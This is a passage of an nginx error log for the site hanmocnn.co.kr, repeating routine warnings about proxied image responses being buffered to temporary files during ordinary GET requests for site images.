/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:10:42 [warn] 956#956: *98580 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/28/0000018284 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:51:49 [warn] 956#956: *98620 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/28/0000018285 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:51:49 [warn] 956#956: *98620 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/28/0000018286 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:51:50 [warn] 956#956: *98620 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/28/0000018287 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:54:25 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/28/0000018288 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:54:25 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/28/0000018289 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:55:44 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/29/0000018290 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:55:44 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/29/0000018291 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 11:55:44 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/29/0000018292 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 12:15:42 [warn] 962#962: *98740 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/29/0000018293 while reading upstream, client: 68.183.27.37, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 12:44:35 [warn] 962#962: *98749 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/29/0000018294 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 12:46:12 [warn] 962#962: *98779 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/29/0000018295 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 12:46:12 [warn] 962#962: *98779 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/29/0000018296 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 12:46:12 [warn] 962#962: *98779 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/29/0000018297 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/29/0000018298 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/29/0000018299 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/30/0000018300 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/30/0000018301 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/30/0000018302 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/30/0000018303 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/30/0000018304 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/30/0000018305 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:09:31 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/30/0000018306 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:15:10 [warn] 961#961: *100349 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/05/0000019050 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:15:10 [warn] 961#961: *100349 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/05/0000019051 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:19:55 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/05/0000019052 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:19:55 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/05/0000019053 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:20:01 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/05/0000019054 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:20:01 [warn] 961#961: *100381 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/05/0000019055 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:52:10 [warn] 961#961: *100446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/05/0000019056 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:52:10 [warn] 961#961: *100446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/05/0000019057 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:52:11 [warn] 961#961: *100446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/05/0000019058 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:57:27 [warn] 961#961: *100462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/05/0000019059 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:58:03 [warn] 961#961: *100462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/06/0000019060 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:58:03 [warn] 961#961: *100462 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/06/0000019061 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/06/0000019062 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/06/0000019063 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/06/0000019064 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 13:59:45 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/06/0000019065 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:00:50 [warn] 961#961: *100507 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/06/0000019066 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/06/0000019067 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/06/0000019068 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/06/0000019069 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/07/0000019070 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/07/0000019071 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:04:08 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/07/0000019072 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:04:23 [warn] 961#961: *100538 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/07/0000019073 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:05:57 [warn] 961#961: *100568 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/07/0000019074 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:05:57 [warn] 961#961: *100568 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/07/0000019075 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:05:57 [warn] 961#961: *100568 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/07/0000019076 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:08:05 [warn] 961#961: *100612 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/07/0000019077 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 14:08:05 [warn] 961#961: *100612 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/07/0000019078 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:33:39 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/82/0000019823 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:33:39 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/82/0000019824 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:33:39 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/82/0000019825 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:34:00 [warn] 976#976: *102477 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/82/0000019826 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:37:32 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/82/0000019827 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:37:48 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/82/0000019828 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:39:01 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/82/0000019829 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:39:01 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/83/0000019830 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:40:19 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/83/0000019831 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:40:19 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/83/0000019832 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:40:19 [warn] 976#976: *102508 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/83/0000019833 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:41:10 [warn] 976#976: *102590 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/83/0000019834 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:41:10 [warn] 976#976: *102590 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/83/0000019835 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:41:11 [warn] 976#976: *102590 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/83/0000019836 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/83/0000019837 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/83/0000019838 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/83/0000019839 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:42:11 [warn] 976#976: *102607 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/84/0000019840 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 21:59:30 [warn] 976#976: *102635 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/84/0000019841 while reading upstream, client: 121.139.173.148, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 